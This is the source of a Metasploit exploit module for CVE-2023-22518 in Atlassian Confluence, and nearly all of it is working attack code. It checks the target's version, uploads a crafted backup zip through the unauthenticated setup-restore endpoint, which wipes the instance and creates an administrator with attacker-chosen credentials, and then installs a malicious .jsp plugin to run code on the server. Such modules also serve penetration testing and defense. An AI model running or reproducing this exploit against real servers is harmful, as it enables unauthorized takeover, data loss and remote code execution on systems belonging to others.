##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version
include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::PayloadPlugin
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)',
'Description' => %q{
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
Confluence instance administrator account. Using this account, an attacker can then perform all
administrative actions that are available to Confluence instance administrator. This module uses the
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
execution on the target in the context of the of the user running the confluence server.
},
'Author' => [
'Atlassian', # Discovery
'jheysel-r7' # msf module
],
'References' => [
[ 'URL', 'https://jira.atlassian.com/browse/CONFSERVER-93142'],
[ 'CVE', '2023-22518']
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Targets' => [
[
'Java',
{
'Platform' => 'java',
'Arch' => [ARCH_JAVA]
},
]
],
'DisclosureDate' => '2023-10-31',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ CONFIG_CHANGES, ], # Major config changes - this module overwrites the confluence server with an empty backup with known admin credentials
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)
register_options(
[
Opt::RPORT(8090),
OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
# The endpoint we target to trigger the vulnerability.
OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action', '/json/setup-restore-local.action', '/json/setup-restore-progress.action']]),
# We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.
OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])
]
)
end
def check
confluence_version = get_confluence_version
return Exploit::CheckCode::Unknown('Unable to determine the confluence version') unless confluence_version
# Confluence Server and Confluence Data Center have the same vulnerable version ranges.
if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) ||
confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) ||
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2')) ||
confluence_version == Rex::Version.new('8.6.0')
return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
end
Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
end
# https://passlib.readthedocs.io/en/stable/lib/passlib.hash.atlassian_pbkdf2_sha1.html
def generate_hash(password)
salt = OpenSSL::Random.random_bytes(16)
iterations = 10000
digest = OpenSSL::Digest.new('SHA1')
key = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, 32, digest)
salted_key = salt + key
encoded_hash = Base64.strict_encode64(salted_key)
'{PKCS5S2}' + encoded_hash
end
def create_zip
zip_file = Rex::Zip::Archive.new
# exportDescriptor.properties needs to be present in the zip file in order for it to be valid.
export_descriptor = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-22518', 'exportDescriptor.properties'))
zip_file.add_file('exportDescriptor.properties', export_descriptor)
entities_xml = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-22518', 'entities.xml'))
entities_xml.gsub!('NEW_USERNAME_LOWER', datastore['NEW_USERNAME'].downcase)
entities_xml.gsub!('NEW_USERNAME', datastore['NEW_USERNAME'])
entities_xml.gsub!('NEW_PASSWORD_HASH', generate_hash(datastore['NEW_PASSWORD']))
zip_file.add_file('entities.xml', entities_xml)
zip_file.pack
end
def upload_backup
zip_file = create_zip
post_data = Rex::MIME::Message.new
post_data.add_part('false', nil, nil, 'form-data; name="buildIndex"')
post_data.add_part('Upload and import', nil, nil, 'form-data; name="edit"')
post_data.add_part(zip_file, 'application/zip', 'binary', "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(8..16)}\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT']),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'keep_cookies' => true,
'headers' => {
'X-Atlassian-Token' => 'no-check'
},
'vars_get' => {
'synchronous' => 'true'
}
}, 120)
fail_with(Failure::UnexpectedReply, "The endpoint #{datastore['CONFLUENCE_TARGET_ENDPOINT']} did not respond with a 302 or a 200") unless res&.code == 302 || res&.code == 200
print_good("Exploit Success! Login Using '#{datastore['NEW_USERNAME']} :: #{datastore['NEW_PASSWORD']}'")
end
def exploit
print_status("Setting credentials: #{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
# Exploit CVE-2023-22518 by uploading a backup .zip file to confluence with an attacker defined username & password
upload_backup
# Now with admin access, upload a .jsp plugin using the PayloadPlugin mixin to gain RCE on the target system.
payload_endpoint = rand_text_alphanumeric(8)
plugin_key = rand_text_alpha(8)
begin
payload_plugin = generate_payload_plugin(plugin_key, payload_endpoint)
upload_payload_plugin(payload_plugin, datastore['NEW_USERNAME'], datastore['NEW_PASSWORD'])
trigger_payload_plugin(payload_endpoint)
ensure
delete_payload_plugin(plugin_key, payload_endpoint, datastore['NEW_USERNAME'], datastore['NEW_PASSWORD'])
end
end
end